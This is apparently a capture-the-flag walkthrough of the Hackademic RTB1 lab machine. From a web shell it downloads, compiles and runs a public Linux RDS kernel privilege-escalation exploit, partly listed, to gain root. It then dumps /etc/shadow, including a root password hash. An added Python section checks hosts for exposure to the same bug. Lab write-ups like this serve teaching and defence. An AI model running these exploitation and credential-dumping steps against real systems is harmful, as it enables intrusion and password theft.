Now let's connect and take a look:
Let's try whether we can run some Linux commands.
id
uid=48(apache) gid=489(apache) groups=489(apache)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
The id command shows the current user's UID, GID and group memberships.
The pwd command shows the server's current working directory.
The uname -a command shows system information, including the kernel version.
Good, now we know the server's kernel version is 2.6.31.5-127.fc12.i686.
Let's look up the vulnerability information on exploit-db.com for this version, "kernel 2.6.31":
Date       | D | A | V    | Description                                                            | Plat. | Author
2009-10-15 | § | - | 904  | Linux Kernel < 2.6.31-rc4 nfs4_proc_lock() Denial of Service           | linux | Simon Vallet
2009-08-31 | § | - | 1370 | Linux Kernel < 2.6.31-rc7 AF_IRDA 29-Byte Stack Disclosure Exploit     | linux | Jon Oberheide
2009-08-25 | § | - | 1059 | Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure  | linux | Jon Oberheide
2009-08-04 | § | - | 1064 | Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit | linux | Jon Oberheide
After that I tried every exploit in the list, and not one of them worked. My luck was a bit low! So I reached for a bigger weapon (a newer exploit):
Date       | D | A | V    | Description                                   | Plat. | Author
2010-10-19 | § | - | 9977 | Linux RDS Protocol Local Privilege Escalation | linux | Dan Rosenberg
http://www.exploit-db.com/exploits/15285
I open that page and copy this download address:
http://www.exploit-db.com/download/15285
Then, in the shell that nc bounced back to us, I run this command:
wget http://www.exploit-db.com/download/15285 -O roro.c
--2011-12-28 00:48:01--  http://www.exploit-db.com/download/15285
Resolving www.exploit-db.com... 199.27.135.111, 199.27.134.111
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/15285/ [following]
--2011-12-28 00:48:02--  http://www.exploit-db.com/download/15285/
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7154 (7.0K) [application/txt]
Saving to: `roro.c'
0K ..
We use the wget command to fetch the exploit from exploit-db.com, and the -O option to save it under the name roro.c.
Note: the Linux kernel is mostly written in C, so the file is saved with a .c extension. Now let's look at the exploit's source code.
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/utsname.h>

#define RECVPORT 5555
#define SENDPORT 6666

int prep_sock(int port)
{
    int s, ret;
    struct sockaddr_in addr;

    /* open an RDS socket: the protocol family this exploit works through */
    s = socket(PF_RDS, SOCK_SEQPACKET, 0);
    if(s < 0)
    {
        printf("[*] Could not open socket.\n");
        exit(-1);
    }

    memset(&addr, 0, sizeof(addr));
    /* ... the rest of prep_sock() and of the exploit is cut off in the original listing ... */
The code above is all written in C.
After saving it, we compile the code into an ELF binary:
gcc roro.c -o roro
Run the exploit:
./roro
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
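From the defender's side, the two facts this page surfaces, the kernel release string from uname -a and the exploit banner's stated range (Linux kernel >= 2.6.30, reached through an RDS socket), are enough to write an exposure check for a host. The Python below is an added example, not code from the writeup or from exploit-db; the uname line is the one captured above, while the /proc/modules and modprobe.d contents and the function names are constructed for this example, and the lower bound it uses is the only version information the page gives.

```python
import re

# Lower bound stated in the exploit's own banner on this page ("Linux kernel >= 2.6.30");
# the page gives no upper bound, so everything at or above it is treated as potentially affected.
RDS_AFFECTED_FROM = (2, 6, 30)

# Constructed sample inputs: the uname line is the one captured on the page, the
# /proc/modules and modprobe.d contents are made up for this example.
UNAME_A = ("Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP "
           "Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux")
PROC_MODULES = "ipv6 264800 14 - Live 0xe0a00000\nrds 91120 0 - Live 0xe09d0000\n"
MODPROBE_BEFORE = "# no rds entry yet\n"
MODPROBE_AFTER = "# prevent rds from being auto-loaded on socket()\ninstall rds /bin/true\n"

def parse_kernel_release(release):
    """Turn 'uname -r' text such as '2.6.31.5-127.fc12.i686' into (major, minor, patch)."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError("unrecognised kernel release: %r" % release)
    return tuple(int(x) for x in m.groups(default="0"))

def kernel_in_affected_range(release):
    return parse_kernel_release(release) >= RDS_AFFECTED_FROM

def rds_module_loaded(proc_modules_text):
    """/proc/modules lists one module per line, name first."""
    names = [line.split()[0] for line in proc_modules_text.splitlines() if line.strip()]
    return "rds" in names

def rds_module_disabled(modprobe_conf_text):
    """True only for an 'install rds /bin/true' (or /bin/false) override in modprobe.d."""
    for line in modprobe_conf_text.splitlines():
        parts = line.split("#", 1)[0].split()
        if parts[:2] == ["install", "rds"] and parts[2:3] in (["/bin/true"], ["/bin/false"]):
            return True
    return False

def assess(uname_a_line, proc_modules_text, modprobe_conf_text):
    """Combine the three inputs into one verdict; 'exposed' is what a reviewer acts on."""
    release = uname_a_line.split()[2]  # third field of 'uname -a' is the kernel release
    affected = kernel_in_affected_range(release)
    disabled = rds_module_disabled(modprobe_conf_text)
    return {"release": release, "affected_version": affected,
            "rds_loaded": rds_module_loaded(proc_modules_text),
            "rds_disabled": disabled, "exposed": affected and not disabled}

if __name__ == "__main__":
    for conf in (MODPROBE_BEFORE, MODPROBE_AFTER):
        print(assess(UNAME_A, PROC_MODULES, conf))
```

On a real host the three inputs come from `uname -a`, `/proc/modules` and the files under `/etc/modprobe.d/`; the verdict only says the kernel is in the banner's range and the module is not neutralised, so patching the kernel remains the actual fix.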
Then we run the id command again, and we can see that we have obtained root privileges:
uid=0(root) gid=0(root)
We can now read the /etc/shadow file:
cat /etc/shadow
root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::